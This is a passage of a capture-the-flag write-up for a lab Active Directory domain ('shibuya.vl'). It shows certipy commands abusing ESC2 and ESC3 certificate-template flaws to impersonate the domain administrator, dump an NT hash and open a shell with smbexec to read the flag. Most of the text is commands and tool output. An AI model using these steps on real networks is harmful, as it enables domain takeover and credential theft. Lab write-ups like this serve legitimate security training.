SHIBUYA\t1_admins S-1-5-21-87560095-894484815-3652015022-1103
Object Control Permissions
Owner : SHIBUYA\_admin S-1-5-21-87560095-894484815-3652015022-500
WriteOwner Principals : SHIBUYA\_admin S-1-5-21-87560095-894484815-3652015022-500
SHIBUYA\Domain Admins S-1-5-21-87560095-894484815-3652015022-512
SHIBUYA\Enterprise Admins S-1-5-21-87560095-894484815-3652015022-519
WriteDacl Principals : SHIBUYA\_admin S-1-5-21-87560095-894484815-3652015022-500
SHIBUYA\Domain Admins S-1-5-21-87560095-894484815-3652015022-512
SHIBUYA\Enterprise Admins S-1-5-21-87560095-894484815-3652015022-519
WriteProperty Principals : SHIBUYA\_admin S-1-5-21-87560095-894484815-3652015022-500
SHIBUYA\Domain Admins S-1-5-21-87560095-894484815-3652015022-512
SHIBUYA\Enterprise Admins S-1-5-21-87560095-894484815-3652015022-519
<SNIP>
We also can configure port forwarding with iptables, which allowed me to use certipy
1
2
3
4
5
6
# Forward to
sudo iptables -t nat -A OUTPUT -d 10.10.84.227 -p tcp --dport 389 -j DNAT --to-destination 10.10.84.227:3268
sudo iptables -t nat -A OUTPUT -d 10.10.84.227 -p tcp --dport 636 -j DNAT --to-destination 10.10.84.227:3269
# To delete
sudo iptables -t nat -nL --line-numbers
sudo iptables -t nat -D OUTPUT 2
Now, when we run certipy, we find that there is vulnerable certificate template
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
└─$ certipy find -u nigel.mills@shibuya.vl -p '<REDACTED>' -dc-ip 10.10.84.227 -debug -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
Certificate Templates
0
Template Name : ShibuyaWeb
Display Name : ShibuyaWeb
Certificate Authorities : shibuya-AWSJPDC0522-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : False
Certificate Name Flag : None
Enrollment Flag : None
Private Key Flag : AttestNone
Extended Key Usage : Any Purpose
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 75 years
Permissions
Enrollment Permissions
Enrollment Rights : SHIBUYA.VL\t1_admins
SHIBUYA.VL\Domain Admins
SHIBUYA.VL\Enterprise Admins
Object Control Permissions
Owner : SHIBUYA.VL\_admin
Write Owner Principals : SHIBUYA.VL\Domain Admins
SHIBUYA.VL\Enterprise Admins
SHIBUYA.VL\_admin
Write Dacl Principals : SHIBUYA.VL\Domain Admins
SHIBUYA.VL\Enterprise Admins
SHIBUYA.VL\_admin
Write Property Principals : SHIBUYA.VL\Domain Admins
SHIBUYA.VL\Enterprise Admins
SHIBUYA.VL\_admin
[!] Vulnerabilities
ESC2 : 'SHIBUYA.VL\\t1_admins' can enroll and template can be used for any purpose
ESC3 : 'SHIBUYA.VL\\t1_admins' can enroll and template has Certificate Request Agent EKU set
ESC2
It’s similar to ESC1, just follow the steps from:
1
2
3
4
5
6
7
8
9
└─$ certipy req -u nigel.mills@shibuya.vl -p '<REDACTED>' -dc-ip 10.10.84.227 -upn '_admin@shibuya.vl' -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 4
Would you like to save the private key? (y/N) y
[*] Saved private key to 4.key
[-] Failed to request certificate
Change the key size and request again
1
2
3
4
5
6
7
8
9
10
└─$ certipy req -u nigel.mills@shibuya.vl -p '<REDACTED>' -dc-ip 10.10.84.227 -upn '_admin@shibuya.vl' -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN '_admin@shibuya.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to '_admin.pfx'
We have an error
1
2
3
4
5
6
└─$ certipy auth -pfx '_admin.pfx' -dc-ip 10.10.84.227
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user '_admin'
It seems like the error is due to CBA patch. There was already PR for this case, so we need to use -sid option. Specify sid of _admin user
1
2
3
4
5
6
7
8
9
└─$ certipy req -u nigel.mills@shibuya.vl -p '<REDACTED>' -dc-ip 10.10.84.227 -upn _admin@shibuya.vl -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -key-size 4096 -sid 'S-1-5-21-87560095-894484815-3652015022-500'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN '_admin@shibuya.vl'
[*] Certificate object SID is 'S-1-5-21-87560095-894484815-3652015022-500'
[*] Saved certificate and private key to '_admin.pfx'
Now authentication with certificate works
1
2
3
4
5
6
7
8
9
└─$ certipy auth -pfx '_admin.pfx' -dc-ip 10.10.84.227
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '_admin@shibuya.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
ESC3
We can follow steps from:
1
2
3
4
5
6
7
8
9
10
└─$ certipy req -u nigel.mills@shibuya.vl -p '<REDACTED>' -dc-ip 10.10.84.227 -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 9
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'nigel.mills.pfx'
1
2
3
4
5
6
7
8
9
└─$ certipy req -u nigel.mills@shibuya.vl -p '<REDACTED>' -dc-ip 10.10.84.227 -ca shibuya-AWSJPDC0522-CA -template User -key-size 4096 -pfx nigel.mills.pfx -on-behalf-of 'shibuya\_admin'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN '_admin@shibuya.vl'
[*] Certificate object SID is 'S-1-5-21-87560095-894484815-3652015022-500'
[*] Saved certificate and private key to '_admin.pfx'
1
2
3
4
5
6
7
8
9
10
└─$ certipy auth -pfx '_admin.pfx' -username _admin -dc-ip 10.10.84.227 -domain 'shibuya.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '_admin@shibuya.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
Connect and grab the flag
1
2
3
4
5
6
7
8
9
└─$ KRB5CCNAME=_admin.ccache smbexec.py -k -no-pass AWSJPDC0522.shibuya.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>type \users\administrator\desktop\flag.txt
The system cannot find the file specified.
C:\Windows\system32>type \users\administrator\desktop\root.txt
VL{<REDACTED>}
https://api.vulnlab.com/api/v1/share?id=3faa2262-9bee-4433-883a-4fb13e951093
This post is licensed under CC BY 4.0 by the author.